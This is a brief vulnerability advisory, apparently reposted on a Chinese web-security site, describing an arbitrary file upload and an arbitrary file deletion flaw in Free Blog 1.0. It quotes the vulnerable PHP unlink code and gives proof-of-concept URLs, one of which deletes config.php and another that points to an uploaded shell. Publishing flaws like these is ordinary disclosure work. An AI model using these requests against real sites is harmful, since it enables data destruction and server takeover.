标题:Free Blog 1.0 Multiple Vulnerability 作者 cr4wl3r http://bastardlabs.info # http://bastardlabs.info/exploits/Free_Blog.txt 软件网站: http://blog.sdnex.com/ 已测试平台: Ubuntu 12.04.1 LTS 测试证明: 任意文件上传 http:// www.2cto.com /blog_path/up.php Shell will be available here http://bastardlabs/blog_path/log/images/shell.php 任意文件删除 ---------- 49 <?php 50 if($_GET['del']){ 51 $id=$_GET['del']; 52 unlink("./log/images/$id"); 53 } 54 ?> ---------- http://bastardlabs/blog_path/up.php?del=[file] http://bastardlabs/blog_path/up.php?del=config.php ------------------------------ My sweetheart http://www.photoshow.com/watch/rx9IX5ZS
查看更多关于Free Blog 1.0多个缺陷及修复 - 网站安全 - 自学php的详细内容...